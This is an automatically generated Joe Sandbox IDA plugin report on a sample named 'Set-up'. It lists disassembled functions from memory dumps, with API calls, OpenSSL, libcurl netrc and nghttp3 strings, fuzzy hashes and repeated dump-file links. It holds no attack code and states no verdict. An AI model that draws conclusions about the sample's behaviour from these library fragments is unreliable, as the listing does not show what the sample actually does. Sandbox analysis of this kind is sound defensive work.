Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: 4ae44570b895db20366752beb14ba5d5e3d1a158fe132d5ba601651c30b3f14a
Instruction ID: 998bff498ae5be9332ba431944d4f0b8a78c8a7c5bd9b3327d0ee684a9074c4f
Opcode Fuzzy Hash: 4ae44570b895db20366752beb14ba5d5e3d1a158fe132d5ba601651c30b3f14a
Instruction Fuzzy Hash: 7C82BD71A083529FD764CE28D88072BB7E1EFC5764F188A3DF8A997291D730DC458B92

Function 002B0170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 002B0374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 002B0395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 002B049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 002B04E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 002B055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 002B057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 002B0618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 002B06E3

Strings

SHA2-512, xrefs: 002B0BA5
SHA2-256, xrefs: 002B0B05
SHA2-384, xrefs: 002B0B62
SHA2-224, xrefs: 002B0238
MD5, xrefs: 002B0194
@, xrefs: 002B0B42
SHA1, xrefs: 002B01F7

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: e00c328f538f030ad1ad1f3a0ac8dc18a45dbcc2a837543eda3c0783cdaaf3f5
Instruction ID: 2a7eced246dbde7127cda91c81f189392f5e2860d8fa6c49f39b3879ebda4505
Opcode Fuzzy Hash: e00c328f538f030ad1ad1f3a0ac8dc18a45dbcc2a837543eda3c0783cdaaf3f5
Instruction Fuzzy Hash: A15291729187818BD711CF28C885BEBB7E4BFD9344F048A2DF9C896252E774D914CB92

Function 001FE270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 001FE28D
FindNextFileW.KERNEL32(?,00000000), ref: 001FE2BB
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 001FE30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001FE3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001FE3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 001FE3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 001FE41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 001FE44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 001FE563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 001FE571

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: 6760b9f4c8a46557f52a40b27c5bf4d2245bbc306bdf6a4d9bb95958e2e7b404
Instruction ID: 3de6938a46553e0c32a6b7c71df1977195388f8257c3eacb1cab85ed0eb0ed4e
Opcode Fuzzy Hash: 6760b9f4c8a46557f52a40b27c5bf4d2245bbc306bdf6a4d9bb95958e2e7b404
Instruction Fuzzy Hash: C7913730600B019FD7218F34CC89B76BBE6FF85325F184669EA558B6B2EB30E950CB50

Function 00390460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 003906A3

Strings

, xrefs: 003916D8
, xrefs: 00391813

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: e847658522d8ba5d325fca2206a5cf75dae0f8a8038ae1a3b08976dd91af7123
Instruction ID: 07420a73ecdf2134a8114585877db222b345c05a6333e96dce1d40d0e9d7a9c6
Opcode Fuzzy Hash: e847658522d8ba5d325fca2206a5cf75dae0f8a8038ae1a3b08976dd91af7123
Instruction Fuzzy Hash: B4D29E72A087558FCB25CF28C88026AF7E2FFC5704F198A2DE99997351D770A945CB82

Function 002687D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00268A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00268A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00268B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00268B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00268A42, 00268F13

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: cf19704ecc6d39236c95ceffa73a7c70885b1a798bcefd0468b4dc9be273c332
Instruction ID: 114fd586012736f68462d3f3dd9eb82a1b9e31464aba53900a8c70b7ea3ce2cc
Opcode Fuzzy Hash: cf19704ecc6d39236c95ceffa73a7c70885b1a798bcefd0468b4dc9be273c332
Instruction Fuzzy Hash: D42202725187429BD711CF38C881BABB7E4FF96304F044A1DF89597282DB71E994CB92

Function 003A4780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 003A47A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003A47C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 003A4800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003A4D16

Strings

H, xrefs: 003A4A88
xn--, xrefs: 003A49D3

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: 657d7586d56dd79bed1b4a77647956e2a5a0ca8eaf6c8e21a013a19d26830aee
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: FCE13771A087158FD719DE28D8C072AB7D2EBC6314F198A3DE9D687381E7B5DC058742

Function 0032C050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0032C090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 0032C0BE

Strings

assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0032C433
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 0032C0CD, 0032C26B
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 0032C0D2, 0032C266
crypto/evp/encode.c, xrefs: 0032C42E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
Opcode ID: 31b7f263adb20acbf12b52c005124500a345ac1ca6ae3c3fb9e93521300c4f8b
Instruction ID: 2dd98548b04b908921128fd45fd39522a4668526e5135db98e4193c2f6b0c0cc
Opcode Fuzzy Hash: 31b7f263adb20acbf12b52c005124500a345ac1ca6ae3c3fb9e93521300c4f8b
Instruction Fuzzy Hash: 26C1297550C3A58FC716DF18D49062EBFE1AF96300F0989ADE9D58B382D235ED01CB92

Function 00182430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00184DB4
ssl/quic/quic_txp.c, xrefs: 00182A29, 00183096, 00183477, 0018357D, 00183FDE, 00184101
@, xrefs: 00184EA7
@, xrefs: 00184F5D

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: d3538c61e90d8ee2184a67760798c5510c207f812a5bad2f73ab4603d76e9c0e
Instruction ID: 68e019489559805322576bc825a2a0b88c2e3cf66e20ed1f7160faec1a0fca86
Opcode Fuzzy Hash: d3538c61e90d8ee2184a67760798c5510c207f812a5bad2f73ab4603d76e9c0e
Instruction Fuzzy Hash: A653D3716083419FD725DF28C880BAAB7E1FF95314F18492DE89987391EB75EA44CF82

Function 00086210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

login, xrefs: 000864FF
netrc.c, xrefs: 00086243, 00086541, 0008655C, 00086609, 00086627, 000866DD, 000866F7, 0008670E, 0008673F, 0008676B
machine, xrefs: 00086456, 00086656
password, xrefs: 000865C6
macdef, xrefs: 0008643B
default, xrefs: 00086471

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: 1c11ef471ce629422780a454ea5532ba50254266e08d46a94a0bf7777617885e
Instruction ID: f3a7b12db48c280f555ac89d12124b4e150432aa376bd28921a1aaccc1ff4bf4
Opcode Fuzzy Hash: 1c11ef471ce629422780a454ea5532ba50254266e08d46a94a0bf7777617885e
Instruction Fuzzy Hash: D9E1057090C3519BE321AF24988576FBFD4BF96708F1A442CF8C557282E7B6DA48C792

Function 003748A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 1070COMMON

Download Yara Rule

Strings

?h, xrefs: 003749E2, 00374B05, 00374C80, 00374D41, 00374DBE, 00374E86, 00374FD9, 00374FF8, 00375107, 00375553, 003755E8, 0037568E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: ?h
API String ID: 0-4286994378
Opcode ID: 7d2d8de7463a75a03d05669072d45b97e852f40cd75a2c756eb9935f9321dcf2
Instruction ID: f947452548b904207682022333a79b1ae1aaf85763ecaa4a5faae378c9f19645
Opcode Fuzzy Hash: 7d2d8de7463a75a03d05669072d45b97e852f40cd75a2c756eb9935f9321dcf2
Instruction Fuzzy Hash: 8FA29C71A08B169FC729CF29C490669F7E1FB88314F15C66DD8A98B781D378F861CB81

Function 001900F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00212212,00000000,00000000), ref: 00190109

Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8

Strings

crypto/asn1/a_object.c, xrefs: 0019012F, 00190151, 0019039E, 001903B4, 001905C3, 001905FC, 0019062C
a2d_ASN1_OBJECT, xrefs: 00190128, 0019014A, 001905BD
1, xrefs: 00190328

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 62552ab3a701602fb5b8ac8dc20c7caa3ad7cefae3feb79fe2b24d4681a3f75f
Instruction ID: 77053f0359eda5d75d29068ecb6ba7d29291acfee4161dc1696694b76cf89027
Opcode Fuzzy Hash: 62552ab3a701602fb5b8ac8dc20c7caa3ad7cefae3feb79fe2b24d4681a3f75f
Instruction Fuzzy Hash: 93E13B719083059FDB22DF28C84172EB7E1AFA9754F05872DF9D8A7292E335D944CB82

Function 000CE070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,000CC1CE,?,00000003,?), ref: 000CE4EE

Strings

nghttp3_qpack.c, xrefs: 000CE4E4
(size_t)(p - buf->last) == len, xrefs: 000CE4E9

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
